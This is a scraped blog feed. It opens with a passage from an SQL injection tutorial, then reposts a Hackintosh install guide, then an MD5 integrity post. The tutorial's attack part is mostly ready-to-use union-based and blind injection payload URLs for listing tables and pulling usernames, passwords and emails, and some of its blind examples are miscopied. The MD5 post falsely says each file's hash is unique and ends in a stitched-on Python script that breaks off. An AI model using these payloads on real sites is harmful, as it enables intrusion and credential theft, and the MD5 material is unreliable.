/><br />it has user and password columns, so an example would be<br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*<br /><br />6). MySQL 5<br /><br />Like I said before, I'm gonna explain how to get table and column names<br />in MySQL > 5.<br /><br />For this we need information_schema. It holds all tables and columns in the database.<br /><br />to get tables we use table_name and information_schema.tables.<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*<br /><br />here we replace our number 2 with table_name to get the first table from information_schema.tables<br /><br />displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*<br /><br />note that I put 0,1 (get 1 result starting from the 0th)<br /><br />now to view the second table, we change limit 0,1 to limit 1,1<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*<br /><br />the second table is displayed.<br /><br />for the third table we put limit 2,1<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*<br /><br />keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc... 
:D<br /><br />To get the column names the method is the same.<br /><br />here we use column_name and information_schema.columns<br /><br />the method is the same as above so an example would be<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*<br /><br />the first column is displayed.<br /><br />the second one (we change limit 0,1 to limit 1,1)<br /><br />i.e.<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*<br /><br />the second column is displayed, so keep incrementing until you get something like<br /><br />username, user, login, password, pass, passwd etc... :D<br /><br />if you wanna display column names for a specific table use this query. (where clause)<br /><br />let's say that we found table users.<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*<br /><br />now we get a column name in table users displayed. Just using LIMIT we can list all columns in table users.<br /><br />Note that this won't work if magic quotes is ON.<br /><br />let's say that we found columns user, pass and email.<br /><br />now to complete the query to put them all together :D<br /><br />for that we use concat(), I described it earlier.<br /><br />i.e.<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*<br /><br />what we get here is user:pass:email from table users.<br /><br />example: admin:hash:whatever@blabla.com<br /><br /><br />That's all in this part, now we can proceed to the harder part :)<br /><br /><br /><br />2. 
Blind SQL Injection<br /><br />Blind injection is a little more complicated than classic injection but it can be done :D<br /><br />I must mention, there is a very good blind SQL injection tutorial by xprog, so it's not bad to read it :D<br /><br />Let's start with advanced stuff.<br /><br />I will be using our example<br /><br />http://www.site.com/news.php?id=5<br /><br />when we execute this, we see some page and articles on that page, pictures etc...<br /><br />then when we want to test it for a blind SQL injection attack<br /><br />http://www.site.com/news.php?id=5 and 1=1 <--- this is always true<br /><br />and the page loads normally, that's ok.<br /><br />now the real test<br /><br />http://www.site.com/news.php?id=5 and 1=2 <--- this is false<br /><br />so if some text, picture or some content is missing on the returned page then that site is vulnerable to blind SQL injection.<br /><br />1) Get the MySQL version<br /><br />to get the version in a blind attack we use substring<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4<br /><br />this should return TRUE if the version of MySQL is 4.<br /><br />replace 4 with 5, and if the query returns TRUE then the version is 5.<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5<br /><br />2) Test if subselect works<br /><br />when select doesn't work then we use subselect<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and (select 1)=1<br /><br />if the page loads normally then subselects work.<br /><br />then we're gonna see if we have access to mysql.user<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1<br /><br />if the page loads normally we have access to mysql.user and then later we can pull some password using the load_file() function and OUTFILE.<br /><br />3). 
Check table and column names<br /><br />This is the part where guessing is your best friend :)<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, because a subselect returns only 1 row, this is very important.)<br /><br />then if the page loads normally without content missing, the table users exists.<br />if you get FALSE (some article missing), just change the table name until you guess the right one :)<br /><br />let's say that we have found that the table name is users, now what we need is the column name.<br /><br />the same as with the table name, we start guessing. Like I said before, try the common names for columns.<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1<br /><br />if the page loads normally we know that the column name is password (if we get false then try common names or just guess)<br /><br />here we merge 1 with the column password, then substring returns the first character (,1,1)<br /><br /><br />4). Pull data from database<br /><br />we found table users and columns username and password, so we're gonna pull characters from that.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80<br /><br />ok this here pulls the first character from the first user in table users.<br /><br />substring here returns the first character and 1 character in length. ascii() converts that 1 character into its ascii value<br /><br />and then we compare it using the greater than symbol > .<br /><br />so if the ascii char is greater than 80, the page loads normally. 
(TRUE)<br /><br />we keep trying until we get false.<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95<br /><br />we get TRUE, keep incrementing<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98<br /><br />TRUE again, higher<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99<br /><br />FALSE!!!<br /><br />so the first character in username is char(99). Using the ascii converter we know that char(99) is the letter 'c'.<br /><br />then let's check the second character.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99<br /><br />Note that I changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)<br /><br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99<br /><br />TRUE, the page loads normally, higher.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107<br /><br />FALSE, lower number.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104<br /><br />TRUE, higher.<br /><br />http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105<br /><br />FALSE!!!<br /><br />we know that the second character is char(105) and that is 'i'. We have 'ci' so far<br /><br />so keep incrementing until you get the end. 
(when >0 returns false we know that we have reached the end).<br /><br />There are some tools for Blind SQL Injection, I think sqlmap is the best, but I'm doing everything manually,<br /><br />because that makes you a better SQL INJECTOR :D<br /><br /><br /><br />Hope you learned something from this paper.<br /><br /><br />Have FUN! (:<br /><br />or you can post your comment to this id<br /><br />hackeramit4u@gmail.com<br /><br /></div>Hacking Skills http://www.blogger.com/profile/13163124608674451144 noreply@blogger.com 0 tag:blogger.com,1999:blog-289744729559414161.post-4124478373336499984 2011-01-29T02:00:00.000-08:00 2011-06-27T20:13:52.752-07:00 Install Mac OS X on any Intel-based PC<div dir="ltr" style="text-align: left;" trbidi="on"><h3 class="post-title entry-title"><a href="http://tonymacx86.blogspot.com/2010/04/iboot-multibeast-install-mac-os-x-on.html"></a> </h3>Any OSx86 installation guide can seem daunting at first glance, especially when trying to remember cryptic terminal commands and sorting through volumes of misinformation on the web. This guide requires no coding, terminal work, or Mac experience of any kind. You will not need access to a Mac. In fact, it's easier and faster for me to install Snow Leopard with fully working components on my system than it is to install Windows 7. And more fun.<br /><br />The <b>iBoot + MultiBeast</b> method is designed and tested for any desktop or laptop running the latest line of Intel processors, the Core i3/i5/i7s. I have had reports of success with older machines as well including CoreDuo, Core2Duo, and even Pentium 4. 
However, AMD processors are not supported.<br /><b><br />YOU WILL NEED</b><br /><ul><li>A computer running an <b>Intel Processor</b></li><li>A blank <b>CD</b> </li><li>A <a href="http://store.apple.com/us/product/MAC_OS_X_SNGL"><b>Mac OS X Snow Leopard Retail DVD</b></a></li><li>To leave any fear of your computer at the door.</li><li>Patience and humility- it may not work out perfectly the first time- but with enough tenacity and grit, you'll reach the promised land. It's easy to get frustrated, but don't give up! There is a community of users with similar hardware in the <b><a href="http://www.tonymacx86.com/">tonymacx86 Forum</a></b> to provide support if you get stuck.</li></ul><b>BEFORE YOU BEGIN</b><br /><ul><li>If you have greater than 4gb of RAM, remove the extra RAM for a <b>maximum of 4gb</b>. You can put any extra RAM back in after the installation process.</li><li>Use only <b>1 graphics card</b> in the <b>1st PCIe slot</b> with <b>1 monitor</b> plugged in.</li><li><b>Remove any hard drives </b>besides the blank drive being used for OS X.</li><li><b>Remove any </b><b>USB peripherals</b> besides keyboard and mouse.</li><li><b>Remove any PCI cards</b> besides graphics- they may not be Mac compatible.</li><li>If using a Gigabyte 1156 board, use the <b>blue Intel SATA ports</b>- not the white Gigabyte SATA ports.</li><li>It's best to use an <b>empty hard drive</b>- you will have to partition and format the drive. </li><li><b>Always back</b><b> up</b> any of your important data.</li></ul><b>STEP 1: BIOS SETTINGS</b><br />You will need to set your BIOS to <b>AHCI</b> mode and your Boot Priority to boot from <b>CD-ROM first</b>. This is the most important step, and one many people overlook. Make sure your BIOS settings match these. 
It's not difficult- the only thing I did on my Gigabyte board besides setting Boot Priority to CD/DVD first was set Optimized Defaults, change SATA to AHCI mode, and set HPET to 64-bit mode.<br /><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil2UZpSQCnPy5aHTVrp05l_AOpa0yITMt9AtexPtGnxhTo3JuWkior9IsRcOUN8-4mGAdNsMEwkMsiqZdf406fWdG4UrHTnCfpN-iEaPtr90cn2OXIJ5KMYNRlsCf02ZPe3B701Y0p5Vo/s1600/Bios+0.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil2UZpSQCnPy5aHTVrp05l_AOpa0yITMt9AtexPtGnxhTo3JuWkior9IsRcOUN8-4mGAdNsMEwkMsiqZdf406fWdG4UrHTnCfpN-iEaPtr90cn2OXIJ5KMYNRlsCf02ZPe3B701Y0p5Vo/s320/Bios+0.JPG" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA6V5CR3lHZ8BFB7Vvdu7jpuDvmV6gFDYrgJ7N6Z0ozNw5f3DPmmd90alQyrRUnxS2Zm6dBS2E__DO8YIXYQ3gV0fSWf3mgDHnklC0OtDPCLay3o-GZkAWcw05Xd4_xUJTV2eu0bpB1lk/s1600/Bios+2.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA6V5CR3lHZ8BFB7Vvdu7jpuDvmV6gFDYrgJ7N6Z0ozNw5f3DPmmd90alQyrRUnxS2Zm6dBS2E__DO8YIXYQ3gV0fSWf3mgDHnklC0OtDPCLay3o-GZkAWcw05Xd4_xUJTV2eu0bpB1lk/s320/Bios+2.JPG" /></a></div><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq9PxM_nc2aGpBYpA2KX7HG_XS9D7N2hPKcWNUqDH_rjg6YRibbMsHoor52yKIRck874r3IW68xAmGPu3MF8nbk5fsCQe0UB0jctGzV39JJi_lzZ2ChyFg8U7TkUtyS67oSIzVImhx7HY/s1600/Bios+3.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq9PxM_nc2aGpBYpA2KX7HG_XS9D7N2hPKcWNUqDH_rjg6YRibbMsHoor52yKIRck874r3IW68xAmGPu3MF8nbk5fsCQe0UB0jctGzV39JJi_lzZ2ChyFg8U7TkUtyS67oSIzVImhx7HY/s320/Bios+3.JPG" /></a><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicnkkC5d6bBqW9ksFDptBZbg683wTQQ-cHZMJYyGJhtoRBFgbCHhmaIIuwpjXPMJGhoeRuKpEJFoLHhBH6mRLF7H-k0F0bDtYbNAkKLzVC73UhBywI6qIW8N2FGsTG56k2r_0rlGZFzS0/s1600/Bios+4.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicnkkC5d6bBqW9ksFDptBZbg683wTQQ-cHZMJYyGJhtoRBFgbCHhmaIIuwpjXPMJGhoeRuKpEJFoLHhBH6mRLF7H-k0F0bDtYbNAkKLzVC73UhBywI6qIW8N2FGsTG56k2r_0rlGZFzS0/s320/Bios+4.JPG" /></a></div><b><br />STEP 2: INSTALL MAC OS X </b><br />In order to boot the Mac OS X Retail DVD, you'll need to download and burn <b><a href="http://www.tonymacx86.com/Public/iBoot.zip">iBoot</a></b>. For desktops and laptops using unsupported Intel CPUs and graphics, a legacy version of iBoot can be downloaded <a href="http://www.tonymacx86.com/Public/iBoot-Legacy.zip">here</a>.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.tonymacx86.com/Public/iBoot.zip"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwdFx9CxC-aViES505kLw0i4yIM_8TNiqvUxcKBKThrmTKC7qPX5aHKa00UJTPpKEziSr7QJfp6njQ_HCE7pazJXk_bCa83aqlCoEx3jJSMbL2GaOCJ3XgapulvYxt6Hx9Jn0jCWwIRpE/s1600/iBoot2LogoBig.jpg" /></a></div><ol><li>Download <b><a href="http://www.tonymacx86.com/Public/iBoot.zip">iBoot</a> </b></li><li><b>Burn</b> the image to <b>CD</b> </li><li>Place <b>iBoot</b> in <b>CD/DVD drive</b></li><li><b>Restart</b> computer</li><li>At <b>Chameleon</b> prompt, eject <b>iBoot</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6FQHdxjHbUPGoolMtOp23mixNwXYSwCxBTdv0ERubr-Bp1Tk7tJtactA9qCRE0dhITnIIJaduyLovn_c4hPpEHfdoAXxh_jRL493aZuhyphenhypheniie2DXP0YFmx0Ma1XKL5KrLub5UQGk-RIpA/s1600/iBoot.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6FQHdxjHbUPGoolMtOp23mixNwXYSwCxBTdv0ERubr-Bp1Tk7tJtactA9qCRE0dhITnIIJaduyLovn_c4hPpEHfdoAXxh_jRL493aZuhyphenhypheniie2DXP0YFmx0Ma1XKL5KrLub5UQGk-RIpA/s320/iBoot.jpg" /></a></div></li><li>Insert your <b><a href="http://store.apple.com/us/product/MAC_OS_X_SNGL">Mac OS X Snow Leopard Retail DVD</a></b> and press <b>F5</b></li><li>When you see the screen below, press <b>enter</b> to begin the boot process</li><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDBEMaQT3-jqwT3g41mGIy9MhagdX6rjveit9wdHxGA4hGAxH4Q1qlPQ9TJyKABR9dkT4_9jEIbPiPD3mJV5_O4cwcL7SICHZ3QJ84mkx35kXGe7ZUbPd2_nw5hTH_Y3I2Xex0SHlKsUk/s1600/Install+DVD.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDBEMaQT3-jqwT3g41mGIy9MhagdX6rjveit9wdHxGA4hGAxH4Q1qlPQ9TJyKABR9dkT4_9jEIbPiPD3mJV5_O4cwcL7SICHZ3QJ84mkx35kXGe7ZUbPd2_nw5hTH_Y3I2Xex0SHlKsUk/s320/Install+DVD.jpg" /></a><b> </b></div><b> </b><li>When you get to the installation screen, open <b>Utilities/Disk Utility. </b><b>NOTE: If you can't get to the installation screen, retry the process, but type -x at the screen above. This will enter Mac OS X Safe Mode, which will allow you to proceed.</b></li><li><b>Partition</b> your hard drive to <b>GUID Partition Table</b></li><li><b>Format</b> your hard drive to <b>Mac OS Extended (Journaled). </b><b>NOTE: Chameleon can only boot from a disk or partition of 1 TB or less. Partition larger drives.</b></li><li>For the purposes of this guide, name it <b>Snow Leopard</b>. You can rename it later.</li><li>Close <b>Disk Utility</b></li><li>When the installer asks you where to install, choose <b>Snow Leopard</b></li><li>Choose <b>Customize</b>, and uncheck additional options. This will hasten the install process. 
You can always install this stuff later.</li><li>Restart computer.</li><li>Place <b>iBoot</b> back in drive.</li><li>When you get to the <b>Chameleon</b> boot selection screen, choose your new <b>Snow Leopard</b> installation.</li><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh-OvoHXRMfrbwYn3N4QtaDsEjrINMktAbFrEVM2f8xjssH7trNBulugj6l54-0A4MThyphenhyphenprJsWWBTb_GqI84V4QBLJRaHBJYK1_d8TO-JyQ3UFjWZ8bCCqs12vhRdwkFiYkzmnHxpYiOk/s1600/iBoot+SL.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh-OvoHXRMfrbwYn3N4QtaDsEjrINMktAbFrEVM2f8xjssH7trNBulugj6l54-0A4MThyphenhyphenprJsWWBTb_GqI84V4QBLJRaHBJYK1_d8TO-JyQ3UFjWZ8bCCqs12vhRdwkFiYkzmnHxpYiOk/s320/iBoot+SL.jpg" /></a><b> </b></div><li>View the super-cool <b><a href="http://www.youtube.com/watch?v=FPTp-YInbJ0"><b>Mac OS X Snow Leopard Welcome Video</b></a></b>, and set up your computer! </li></ol><br /><b>STEP 3: UPDATE TO 10.6.6</b><br />Upon the release of 10.6.2 and the 27" Intel Core i5 and i7 iMacs, Mac OS X Snow Leopard officially supports the Core i5 750 and Core i7 860. The 10.6.6 Update will install a Vanilla Kernel, as well as a host of security and stability fixes. Details are available on Apple's website.<br /><ol><li><b>Open Finder</b> and navigate to your <b>Snow Leopard</b> drive.</li><li>Right-click and delete <b>Mac OS X Install Folder.</b> This folder is an unnecessary remnant of the installation process, and serves no purpose.</li><li>Download the <b><a href="http://support.apple.com/kb/dl1349">Mac OS X 10.6.6 Combo Update</a> </b></li><li>Download <b><a href="http://www.tonymacx86.com/Public/MultiBeast.zip">MultiBeast</a> </b></li><li>Open <b>MultiBeast</b>- don't run it yet, just leave it open. 
Set up windows as shown.</li><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjee5XJXS5id9rE8XvfajxLvSc8Hee2ptntKGI0CApZdVYDBSneuHtthpWPGpK-x_Mvmxw4pFiZxf45J_aJrl2nL3BaooCTJ3ztACEJM1BQgkOkD1NBC0GXqw6oT6OkG8E76opUEvFsr_w/s1600/2+Windows.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjee5XJXS5id9rE8XvfajxLvSc8Hee2ptntKGI0CApZdVYDBSneuHtthpWPGpK-x_Mvmxw4pFiZxf45J_aJrl2nL3BaooCTJ3ztACEJM1BQgkOkD1NBC0GXqw6oT6OkG8E76opUEvFsr_w/s320/2+Windows.png" /></a></div><li>Mount <b>MacOSXUpdCombo10.6.6.dmg</b></li><li>Install <b>MacOSXUpdCombo10.6.6.pkg</b></li><li>Upon completion, the installer will ask you to reboot. <b>DO NOT REBOOT</b>.</li><li>Switch to the already open <b>MultiBeast</b>. If it closes, just re-open it.</li></ol><b>STEP 4: MULTIBEAST</b><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.tonymacx86.com/Public/MultiBeast.zip"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOdS6cGLe6oWBbcyP8FCVIFUS3mhCbCkTwd8qu-KsunZUJALdsRl54cFeqc_31-VNB8zmjLb62_oznxR8QQtZe6JtRm6RtsbvWOvjG0j1PC7R32WASk5P8KVeVXvF15DKpQ2HAAgxLTR8/s320/MultiBeastlogo.png" /></a></div><div style="text-align: center;"><a href="http://www.blogger.com/goog_221219759"><b> </b></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-iE8ndUw1uFrX8EesF9XbKrD61KRCKRNcNxLlL1UppBOWN4tB_YD0oPm903kCT48rXj4jMmmLRikispDQX8z3gv7o4Ndu30ihGcJISC9xY2EpwMUfUvUcbgoRX66dEff-uLJep9HME5A-/s1600/30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-iE8ndUw1uFrX8EesF9XbKrD61KRCKRNcNxLlL1UppBOWN4tB_YD0oPm903kCT48rXj4jMmmLRikispDQX8z3gv7o4Ndu30ihGcJISC9xY2EpwMUfUvUcbgoRX66dEff-uLJep9HME5A-/s400/30.png" width="400" /></a></div><b>MultiBeast</b> is 
an all-in-one post-installation tool designed to enable boot from hard drive, and install support for Audio, Network, and Graphics. It contains two different complete post-installation solutions: EasyBeast and UserDSDT. In addition it includes System Utilities to rebuild caches and repair permissions and a collection of drivers, boot loaders, boot time config files and handy software.<br /><br />Choose <b>one</b> of the following options directly following a fresh installation and update: <br /><br /><b>EasyBeast</b> is a DSDT-free solution for any Core/Core2/Core i system. It installs all of the essentials to allow your system to boot from the hard drive. Audio, Graphics and Network will have to be enabled separately. <b> </b><br /><br /><b>UserDSDT</b> is a bare-minimum solution for those who have their own pre-edited DSDT. Place your DSDT.aml on the desktop before install. Audio, Graphics and Network will have to be enabled separately. <i><b>HINT:</b> Check the <b><a href="http://www.tonymacx86.com/dsdt">DSDT Database</a></b> for a pre-edited DSDT. </i><br /><ol><li>Run <b>MultiBeast</b>.</li><li>If you have a <b>custom DSDT</b> that's been edited, place the file on your desktop and choose <b>UserDSDT</b>. </li><li>All others select <b>EasyBeast </b></li><li>Select <b>System Utilities</b>.<b> </b></li><li>Optionally, you may install further drivers via <b>Advanced Options</b> to enable ethernet, sound, graphics, etc... Be sure to read the documentation provided about each installation option. <b>NOTE:</b> <b>EasyBeast</b>, and <b>UserDSDT</b> install <b>Chameleon RC4</b> by default, so you'll not need to check that option. 
</li><div style="text-align: center;"><span style="font-size: medium;"><a href="http://tonymacx86.blogspot.com/2010/06/multibeast-20.html"><b>MultiBeast Demo Videos</b></a></span><span style="font-size: medium;"><b> </b></span> </div><li>Install to <b>Snow Leopard</b>- it should take about 4 minutes to run scripts.</li><li>Eject <b> iBoot</b>.</li><li>Reboot- from your new <b>Snow Leopard</b> installation drive.</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2MvCuZe06fBwUznYQKtv9Bj8PiOUb3wE_tR8idQFmiG9zo43b4sEQBc2hEile37hrmvu361Xey2ABnfNlNak5qDOP1CFH953I8xXcYVkyQJ7C0QH3l26DxjlHzsQB2DkkQ9Y3j5HKlDU/s1600/SL+Boot.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2MvCuZe06fBwUznYQKtv9Bj8PiOUb3wE_tR8idQFmiG9zo43b4sEQBc2hEile37hrmvu361Xey2ABnfNlNak5qDOP1CFH953I8xXcYVkyQJ7C0QH3l26DxjlHzsQB2DkkQ9Y3j5HKlDU/s320/SL+Boot.jpg" /></a></div><br />Congratulations! You're done!!<br /><br />Your PC is now fully operational, while running the latest version of <b>Mac OS X Snow Leopard</b>! And you have a nice Boot CD to get into your system in case things go awry. Boot your system from iBoot if you have issues. You may run MultiBeast as often as you like.<br /><br />If you can't boot, try typing -x at the Chameleon prompt to enter safe mode, or just boot with iBoot. When you get to the desktop, you can make all of the changes you need to. The best way to start fresh is delete whatever you're trying to get rid of- including the whole /Extra folder, as most kexts are installed there. Then you can re-run MultiBeast. As long as you rebuild caches and repair permissions after you're done, you can do just about anything you want to /Extra/Extensions and /System/Library/Extensions. 
Anything can be tweaked and enabled upon subsequent uses of MultiBeast.<br /><br />If you've had success using iBoot + MultiBeast, consider a <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=HVHVTLBJFDDUQ">contribution</a> to help keep the sites going. We're constantly updating and tweaking our tools to help you.<br /><br />Thanks in advance! <br /><br /><b>-hackeramit4u & MacMan</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWPCcQHrlycEMPdyqFgPR-ZqgE7CmK1ZIfMslHo6IgYBX0DuUk6dqOK0xtG5J5FtWsOBDyQOfrjXhgLE4KQ9FecoJfn6m7AnSAVr54nEk_hwVwY4BPqdhDrygmdo6mzHNrpYEI57B85hsO/s1600/10.6.6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWPCcQHrlycEMPdyqFgPR-ZqgE7CmK1ZIfMslHo6IgYBX0DuUk6dqOK0xtG5J5FtWsOBDyQOfrjXhgLE4KQ9FecoJfn6m7AnSAVr54nEk_hwVwY4BPqdhDrygmdo6mzHNrpYEI57B85hsO/s320/10.6.6.png" width="281" /></a></div><b><br /></b><br /><b>PS: </b>For our most current workarounds and solutions for<b> </b>issues such as USB and audio, check </div>Hacking Skills http://www.blogger.com/profile/13163124608674451144 noreply@blogger.com 1 tag:blogger.com,1999:blog-289744729559414161.post-6570335541844862770 2010-12-21T05:38:00.000-08:00 2011-06-27T20:13:52.753-07:00 MD5 Hash & How to Use it?<br />In this post I will tell you about one of my favorite and most interesting <a href="http://en.wikipedia.org/wiki/Cryptography" target="_blank">cryptographic algorithms</a>, called <b>MD5 </b>(<b>Message-Digest algorithm 5</b>). This algorithm is mainly used to perform file integrity checks under most circumstances. 
Here I will not jump into the technical aspects of this algorithm; rather, I will tell you how to make use of it in your daily life. Before I tell you how to use MD5, I would like to share one of my recent experiences, which made me start using the MD5 algorithm.<br />Recently I made some significant changes and updates to my website and, as is obvious, I generated a complete backup of the site on my server. I downloaded this backup onto my PC and deleted the original one on the server. But after a few days something went wrong and I wanted to restore the backup that I downloaded. When I tried to restore the backup I was shocked! The backup file that I used to restore was corrupted. That means the backup file that I downloaded onto my PC wasn’t exactly the one that was on my server. The reason is that some data loss occurred during the download process. Yes, this data loss can happen often when a file is downloaded from the Internet. The file can be corrupted due to any of the following reasons.<br /><ul><li>Data loss during the download process, due to instability in the Internet connection/server</li><li>Tampering with the file due to virus infections</li><li>Hacker attacks</li></ul>So whenever you download any valuable data from the Internet it is essential that you check the integrity of the downloaded file. That is, you need to ensure that the downloaded file is exactly the same as the original one. In this scenario the MD5 hash can come in handy. All you have to do is generate an MD5 hash (or MD5 checksum) for the intended file on your server. After you download the file onto your PC, generate an MD5 hash again for the downloaded file. 
Compare these two hashes, and if they match it means that the file was downloaded perfectly without any data loss.<br />An MD5 hash is nothing but a 32-digit hexadecimal number, which can look something like the following:<br /><div class="stb-container" id="stb-container"><div class="stb-info-caption_box stb_caption">A Sample MD5 Hash</div><div class="stb-info-body_box stb_body"><b>e4d909c290d0fb1ca068ffaddf22cbd0</b></div></div>This hash is unique for every file irrespective of its size and type. That means two .exe files with the same size will not have the same MD5 hash even though they are of the same type and size. So an MD5 hash can be used to uniquely identify a file.<br /><div></div><h3>How to use MD5 Hash to check the Integrity of Files?</h3><div></div>Suppose you have a file called <b>backup.tar</b> on your server. Before you download it, you need to generate an MD5 hash for this file on your server. To do so use the following command.<br /><i>For UNIX:</i><br /><div class="stb-info_box"><b>md5sum backup.tar</b></div>When you hit ENTER you’ll see something as follows<br /><div class="stb-info_box"><b>e4d909c290d0fb1ca068ffaddf22cbd0</b></div><div></div>This is the MD5 hash for the file <b>backup.tar</b>. After you download this file onto your PC, you can cross-check its integrity by re-generating the MD5 hash for the downloaded file. If both hashes match then it means that the file is perfect. Otherwise it means that the file is corrupt. To generate the MD5 hash for the downloaded file on your Windows PC use the following freeware tool<br /><a href="http://www.md5summer.org/download.html" target="_blank">MD5 Summer</a> (Click on the link to download)<br />I hope you like this post. For further doubts and clarifications please pass your comments. 
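The server-side and PC-side comparison described above, as an added Python example (not code from the original post): it parses `md5sum`-style lines, re-hashes each downloaded file in chunks and reports OK, MISMATCH or MISSING. The file names and contents are constructed samples. MD5 catches accidental corruption, but MD5 collisions can be produced deliberately, so where tampering is the concern pass `"sha256"` to `file_digest` and compare against a `sha256sum` value.

```python
import hashlib
import hmac
import os
import re
import tempfile

CHUNK_SIZE = 1024 * 1024  # read 1 MiB at a time so large backups are never held in memory
HEX_MD5 = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed sample content; it hashes to the sample MD5 value shown in the post.
SAMPLE = b"The quick brown fox jumps over the lazy dog."
SAMPLE_MD5 = "e4d909c290d0fb1ca068ffaddf22cbd0"


def file_digest(path, algorithm="md5"):
    """Hex digest of a file, streamed in chunks (the value md5sum prints)."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK_SIZE), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text):
    """Parse md5sum lines: '<32 hex> <mode><name>' where mode is ' ' or '*'."""
    entries = {}
    for raw in text.splitlines():
        if not raw.strip():
            continue
        digest, _, rest = raw.partition(" ")
        if not HEX_MD5.match(digest) or rest[:1] not in (" ", "*"):
            raise ValueError("not an md5sum line: %r" % raw)
        name = rest[1:]
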